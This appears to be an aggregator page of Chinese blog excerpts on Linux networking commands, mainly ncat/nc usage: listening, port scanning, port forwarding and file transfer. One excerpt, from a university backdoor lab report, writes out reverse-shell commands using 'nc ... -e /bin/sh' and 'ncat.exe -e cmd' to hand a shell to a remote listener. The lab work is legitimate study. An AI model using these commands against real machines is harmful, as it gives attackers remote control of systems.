ncat

Linux网络——查看网络连接情况的命令

纵饮孤独 提交于 2021-02-18 18:32:52
Linux网络——查看网络连接情况的命令 摘要:本文主要学习了Linux中用来查看网络连接情况的命令。 hostname命令 hostname命令用于显示和设置系统的主机名称,设置只是临时生效,永久生效需要更改配置文件。 基本语法 修改主机名: 1 hostname 主机名 查看系统信息: 1 hostname [选项] 选项说明 1 - a:显示主机别名。 2 - d:显示DNS域名。 3 - f:显示FQDN名称。 4 - i:显示主机的ip地址。 5 - s:显示短主机名称,在第一个点处截断。 6 -y:显示NIS域名。 使用举例 1 [root@localhost ~]# hostname 2 localhost.localdomain 3 [root@localhost ~]# hostname - a 4 localhost.localdomain localhost4 localhost4.localdomain4 localhost.localdomain localhost6 localhost6.localdomain6 5 [root@localhost ~]# ping命令 ping命令会向目标主机发送ICMP请求包,常用来测试当前主机与目标主机网络连接状况。 基本语法 1 ping [选项] 选项说明 1 - b:允许ping网关地址。 2 - c 数量

一文让你熟练掌握Linux的ncat(nc)命令

隐身守侯 提交于 2020-12-23 18:46:23
ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读、写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠的后端工具。同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。 ncat / nc 既是一个端口扫描工具,也是一款安全工具,还是一款监测工具,甚至可以做为一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。 在大多数 Debian 发行版中, nc 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7/RHEL 7 的最小化安装中, nc 并不会默认被安装。 你需要用下列命令手工安装。 yum install nmap-ncat -y 系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。 管理员还能用它作为客户端来审计 Web 服务器、 telnet 服务器、邮件服务器等, 通过 nc 我们可以控制发送的每个字符,也可以查看对方的回应。 我们还可以用它捕获客户端发送的数据以此来了解这些客户端是做什么的。 在本文中,我们会通过下面这些例子来学习如何使用 nc 命令。 1) 监听入站连接 通过 -l 选项, ncat 可以进入监听模式,使我们可以在指定端口监听入站连接。

每天一个Linux 命令—— nc 命令

假装没事ソ 提交于 2020-12-21 17:45:24
1.命令简介 nc(netcat)是一个短小精悍、功能实用、简单可靠的网络工具,主要有如下作用: (1)端口侦听,nc 可以作为 server 以 TCP 或 UDP 方式侦听指定端口; (2)端口扫描,nc 可以作为 client 发起 TCP 或 UDP 请求; (3)机器之间传输文件; (4)机器之间网络测速。 nc 实际上是 ncat 的软链接。ncat 是为 Nmap 项目编写的,是 Nmap 套件中的一员,它旨在成为可靠的后端工具,可立即为其他应用程序和用户提供网络连接。ncat 不仅可以使用 IPv4 和 IPv6,还可以为用户提供几乎无限的潜在用途。 Nmap 是 2.命令格式 ` nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port] [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port] ] [hostname] [port[s] ]` 3.选项说明 `-4/6 强制只使用 IPv4/IPv6 地址 -D 在套接字上启用调试 -d 不从 stdin 读取 -h 打印出帮助信息 -k 强制 nc 在当前连接完成后继续侦听另一个连接。注意如果不使用 -l 选项,则使用此选项是错误的 -l 指定

关于学期结束的一些题目的记录

隐身守侯 提交于 2020-08-12 13:44:50
感觉也是有点莫名其妙的自己就步入了大二生活。开学了,当然又不能写博客了。边做边记录,可能不太详细哈。 为这篇水文来个目录。 可以看一下感兴趣的地方。 文章目录 一.CTF题目 1,php_rce 2,open-source 3,give_you_flag 4,功夫再高也怕菜刀 5,stegano 6,Railfence 7,simple-unpack 8,SimpleRAR 9,ics-06 10,easy_RSA 11,国外平台注入题目 二.漏洞复现 三.靶场应用 1,sqli-labs 2,OSCP练习-lazysysadmin靶场 四,蓝队学习 五.kali工具使用 六.CISSP题目记录 七.近期的使用问题 八,自娱自乐,提高逆向兴趣, 九.自己的闲话(简称:瞎逼逼) 一.CTF题目 1,php_rce 打开题目发现这考的应该是一个thinkphp版本5的漏洞复现。 属于thinkphp5 rce的漏洞。 一个远程代码执行漏洞。 我们对这个漏洞的补丁进行分析(其实在现在中也要关注各种各种补丁的发布,逆向出来看与原来有什么不同,找不到0day,实力np的话,1day也是要有的) 代码审计后发现补丁对控制器名称进行了过滤。 查看我们可以利用什么,调用什么。 步骤: 1,设置控制器为\think\App,便可以构造payload调用其方法invokeFuction 2,发现通过$

用netcat,SSH构建IP层Tunnel

浪子不回头ぞ 提交于 2020-08-11 02:03:27
2017/05/06 【关于题外话在最后】 写作本文主要基于两点,首先是因为我前段时间写了几篇关于XXN的新解,收到了很多的邮件反馈,我也思考了很多,另一个方面是因为很多人问我怎么用QQ,P2P搭建一个IP层的Tunnel,我的回答是“我也不知道”。我确实不知道,根本就没有试过,只是有个这样那样的想法…我主要是没有动力和能力去Hack这些非Linux上的东西…所以说,我写这篇文章,用UNIX的方法 “将多个小工具结合起来” 实现我的那些没有实现的想法,抛砖引玉一下。 声明: 本文没有技术含量,甚至不会有什么代码,本文只是一些Linux bash和netcat的使用技巧之堆砌,但我觉得只有这种是理解Everything over App的最好方式,虽然我没有能力将TAP对接到QQ上,但我有能力将其对接到netcat以及ssh上,而netcat,ssh和QQ并没有什么本质的区别,结论是,只要你能找一个通信软件,Tunnel便可以嫁接于其上。 Tunnel的种类 一般而言,传统的Tunnel都是用新的IP报文来运输原始IP报文的,这种新的IP报文往往封装一个新的四层头。但是也有用TCP,UDP来运输原始IP报文的,典型的例子就是OpenXXN,BadXXN等。 事实上,你可以用任何的报文来运输原始IP报文,在上一篇文章《从一个简单的聊天程序SimpleChat看XXX技术》中

2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

僤鯓⒐⒋嵵緔 提交于 2020-05-06 03:09:02
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 实验遇到的问题及解决方法 实验总结与体会 一、后门的概念 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法 二、基础问题回答 问:例举你能想到的一个后门进入到你系统中的可能方式? 当我们打开一个木马网页时,会自动安装木马,生成可执行文件,以此在系统留下后门。 黑客利用系统自身的某个服务或者线程,将后门程序插入到其中 问:例举你知道的后门如何启动起来(win及linux)的方式? Windows:设置为开机自启动、修改注册表项 Linux

2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

强颜欢笑 提交于 2020-05-06 03:08:48
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat,然后各使用netcat互相攻击一次。最后使用在linux用cron设置一个定时启动。 (2)使用socat获取主机Shell, 任务计划启动 与第一个区别在于,第二个虚拟机使用Windows的任务计划启动一次,设置一个定时启动。 (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 可执行文件就是后门程序。利用ncat或socat传送如果不行,复制粘贴也可以。 (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。 这个就是获取shell以后的阶段,很有意思了。 (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell加分内容一并写入本实验报告。 这个不是很懂。。。也暂时没有做,过段时间看看别人的,问题不大。 2.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 一个是通过U盘硬盘这种可移动设备,如果写一个AutoRun.inf,插上以后就会自动运行后门。 二是盗版软件,破解工具。实际上这可能是无法避免的

2018-2019-2 网络对抗技术 20165230 Exp2 后门原理与实践

谁说我不能喝 提交于 2020-05-06 03:08:33
[toc] <font size=3> 1.实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 2.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在下载的软件中 邮箱附件、网站链接 注入在可执行文件里 注入在office文件的宏里面 2.例举你知道的后门如何启动起来(win及linux)的方式? 更改名字伪装成其他程序,一点击即启动 Linux可以通过cron启动 Windows下通过任务计划、开机自启动、修改注册表项来启动后门程序 3.Meterpreter有哪些给你映像深刻的功能? 获取摄像头权限进行拍照、录像 获取麦克风权限进行录音 获取键盘输入 提升用户权限 4.如何发现自己有系统有没有被安装后门? 安装杀毒软件并进行扫描 观察进程以及端口,看看有没有异常开放的端口 查看开机自启动向、注册表项中有无异常 3.常用后门工具实践 3.1netcat Windows获得Linux

20155216 Exp2 后门原理与实践

冷暖自知 提交于 2020-05-06 01:45:41
后门原理与实践 实验内容: 常用后门工具 NC 或 netcat netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 Linux: 一般自带netcat,"man netcat" 或"man nc"可查看其使用说明。 Win获得Linux Shell 1、windows 打开监听 先解压ncat.rar,使用Dos命令行,进入ncat文件夹运行可执行文件ncat.exe。使用 ncat.exe -l -p 5216 使5216端口处于监听状态。 2、Linux反弹连接win 使用ipconfig查询主机IP地址。 使用 nc 192.168.1.104 5216 -e /bin/sh 。 3、windows下获得一个linux shell 可运行任何指令,如ls: Linux获得Win Shell 1、Linux运行监听指令 Linux下输入命令 nc -l -p 5216 。 2、.Windows反弹连接Linux 使用 ifconfig 查看Linux的IP地址。 使用Dos命令行输入 ncat.exe -e cmd.192.168.253.128 5216 。 3.Linux下看到Windows的命令提示 Netcat扩展知识 nc传输数据 1、Windows下监听5216端口: ncat.exe -l -p 5216 。

netcat ncat nc 常用功能介绍

梦想的初衷 提交于 2020-03-09 22:03:29
nc [选项] [主机] [端口(s)] -l 开启 listen 模式 -c 执行命令 nc 与 netcat、ncat 同义。 当作服务器或客户端 <!-- lang: shell --> $ nc -l 1234 # 服务器 $ nc 127.0.0.1 1234 # 客户端 端口扫描 <!-- lang: shell --> $ nc -z www.baidu.com 80-81 端口转发 <!-- lang: shell --> $ nc -l 80 -c "nc www.baidu.com 80" # 将发往本机 80 端口的数据转发给 google.com 的 80 端口 数据传输 文件从 client 传到 server;反过来也可以。 <!-- lang: shell --> $ nc -l 1234 > filename.out $ nc host.example.com 1234 < filename.in 参考 man nc Forwarding ports using netcat Netcat - Wikipedia 8 个实用的 Linux netcat 命令示例 比 man nc 多讲了些不常用的参数。 来源: oschina 链接: https://my.oschina.net/u/759266/blog/181783